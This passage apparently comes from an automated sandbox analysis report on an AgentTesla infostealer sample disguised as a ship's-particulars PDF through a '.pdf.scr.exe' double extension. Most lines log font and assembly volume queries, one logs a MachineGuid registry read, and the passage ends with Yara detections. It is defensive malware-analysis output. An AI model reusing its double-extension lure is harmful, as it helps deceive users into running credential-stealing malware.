                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected AgentTesla
                  Source: Yara matchFile source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.3778ee0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.37b3500.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.37b3500.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.3778ee0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.4188253761.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
